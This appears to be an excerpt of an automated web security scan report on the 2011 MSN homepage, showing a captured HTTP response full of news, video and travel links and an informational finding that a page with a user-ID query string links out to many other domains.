http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000
http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007
http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp
http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006
http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002
http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers
https://careers.microsoft.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:06:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44485
Content-Length: 44485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge & beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore & Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool & darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<span><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Videos: Animals on the Attack </a>
...[SNIP]...
<li style="width:206px;" class="first"><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg" title=" Image: Video still of warring warthogs (.. Animal Planet) " width="206" height="144" alt=" Image: Video still of warring warthogs (.. Animal Planet) " /></a><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Warring warthogs fond of fighting </a>
...[SNIP]...
<li style="width:206px;"><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg" title="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" width="206" height="144" alt="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Baby rhino races to mom's rescue </a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006"><img src="http://col.stb.s-msn.com/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg" title="Image: Video still of fighting male giraffes (.. Animal Planet)" width="206" height="144" alt="Image: Video still of fighting male giraffes (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42006">Angry giraffes caught necking </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises & famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&form=trvcon&gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon&gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket & gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
<a href="http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135"><img class="portrait" src="http://col.stb.s-msn.com/i/A2/2888962E701EAAE9359FF470864F30.jpg" title="Image: Nicole Richie (.. George Pimentel/WireImage)" width="116" height="175" alt="Image: Nicole Richie (.. George Pimentel/WireImage)" /></a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Ryan Seacrest brings Jimmy Kimmel a special drink</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Jay puts 'The Bachelor' in the hot seat</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000">Take a quiz & get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008"><strong>
...[SNIP]...
<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&rel=msn&from=en-us_msnhp&form=MSNRLL>=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&cid=msntab1174865&FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&cid=msntab1173638&FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON">37 steals & deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<a href="http://appetiteforlife.redacted/?section=episodes&content=2&source=msn&from=en-us_msnhp&GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.431. http://www.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.redacted/?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1

The response contains the following links to other domains:

http://advertising.microsoft.com/home/home
http://col.stb.s-redacted/i/3E/3E32A65A54765E9193E7946B7F64.jpg
http://col.stb.s-redacted/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg
http://col.stb.s-redacted/i/51/E28E2C88338D867AE51A2853768E.jpg
http://col.stb.s-redacted/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg
http://col.stb.s-redacted/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg
http://col.stb.s-redacted/i/69/38A7E111C7E3A98263F6658E7063D2.jpg
http://col.stb.s-redacted/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg
http://col.stb.s-redacted/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg
http://col.stb.s-redacted/i/80/EA261A55FB948339E67F47051B4F6.jpg
http://col.stb.s-redacted/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg
http://col.stb.s-redacted/i/90/FB7888CDDECEAEF33752C48C04286.jpg
http://col.stb.s-redacted/i/9F/2177C83925E3767FB9AC282991F22.jpg
http://col.stb.s-redacted/i/A5/79D26D4C8D9DA16339279967F5473.jpg
http://col.stb.s-redacted/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg
http://col.stb.s-redacted/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg
http://col.stb.s-redacted/i/BA/C029CA31B84EE7CFCB17C349435C.jpg
http://col.stb.s-redacted/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg
http://col.stb.s-redacted/i/CD/70685892D9EC978E450FF891858.jpg
http://col.stb.s-redacted/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg
http://col.stb.s-redacted/i/DF/749E3611476657BDEDA1876151B3D.jpg
http://col.stb.s-redacted/i/F8/81185586C353EC6EA7CB7985B625C.jpg
http://col.stb.s-redacted/i/FB/39B57119E113EAC72C86F212549.jpg
http://col.stc.s-redacted/br/sc/i/icons/adchoices_gif.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001
http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&sc_extcmp=JS_1302_jobmod
http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&sc_extcmp=JS_1391_jobmod
http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&sc_extcmp=JS_1951_jobmod
http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&sc_extcmp=JS_2469_jobmod
http://msn.chemistry.com/cp/landing/57269?trackingid=516068&bannerid=2117936&gt1=26000
http://msn.foxsports.com/collegebasketball/scores
http://msn.foxsports.com/fantasy/football/big-game-challenge
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/mlb/story/Martin-Luther-King-III-looking-to-buy-New-York-Mets-012911
http://msn.foxsports.com/nba/page/heat-or-threepeat
http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&GT1=39002
http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002
http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911
http://msn.foxsports.com/nfl?GT1=39028
http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://recruiting.scout.com/2/1043469.html
http://static.foxsports.com/content/fscom/img/2011/01/30/djokovic_20110130064153395_116_175.JPG
http://www.bing.com/maps/explore/?org=aj&FORM=Z9LH9
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNHPT
http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&form=ap&gt1=36010
http://www.bing.com/search?q=how+to+live+on+a+tight+budget&form=ap&gt1=36010
http://www.bing.com/search?q=job+interview+makeup&form=ap&gt1=36010
http://www.bing.com/search?q=mom+cave+essentials&form=msnhed&GT1=36010
http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON
http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&cid=msn1177192&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&cid=msn1177190&form=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&cid=msntab1162226&FORM=TRVCON
http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&cid=msn1176921&FORM=TRVCON&gt1=41000
http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&cid=msn1176778&FORM=TRVCON&GT1=41000
